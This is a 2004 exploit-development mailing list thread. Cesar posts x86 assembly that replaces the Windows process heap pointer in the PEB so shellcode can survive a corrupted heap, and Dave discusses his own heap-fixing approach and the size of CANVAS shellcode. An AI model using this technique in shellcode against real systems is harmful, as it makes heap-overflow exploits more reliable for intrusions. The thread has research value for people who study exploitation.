Dailydave
mailing list archives
Re: Fix heap code
From: dave <dave () immunitysec com>
Date: Fri, 18 Jun 2004 21:00:41 -0400
Well, that's certainly smaller than my code! :> My original code was
similar to this, although I also replaced all the other heaps stored in
the PEB with one from HeapCreate, and then went through and did a
SP-dependent replacement of various global variables where MSVCRT and
WS2_32 had stored a copy of the default heap.
I've basically given up on that way except for special cases now though.
Although future mallocs will take place with the new heap, free() on a
corrupted heap can still crash the program. For most people this doesn't
really matter, as their shellcode CreateProcess()'s immediately and does
some simple anonymous pipe stuff, but the CANVAS shellcode is a bit more
complex, and requires the full API to be steady.
Of course, my shellcode is now a whopping 1259 bytes, which does have
its disadvantages. I can hear dildog now: "What are you writing, an MFC
shellcode?"
-dave
Cesar wrote:
Hi.
Dave was talking about some generic fix heap code. I'm
working on a new Windows local heap hole, and I'm
using the following code to fix the heap. It's working ok
on W2k; I just thought I would share this and hear
comments:
//Fixing the heap
mov eax, dword ptr fs:[0x18]    // Get pointer to TEB
mov eax, dword ptr [eax+0x30]   // Get pointer to the PEB from TEB
lea ebx, dword ptr [eax+0x18]   // Get pointer to process heap from PEB
mov eax, dword ptr [eax+0x90]   // Get pointer to heaps list
lea eax, [eax+0x4]              // Skip the first entry (the process heap itself)
mov eax, [eax]                  // Get pointer to next heap in list
mov [ebx], eax                  // Replace process heap with next heap in list
Cesar.
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://www.immunitysec.com/mailman/listinfo/dailydave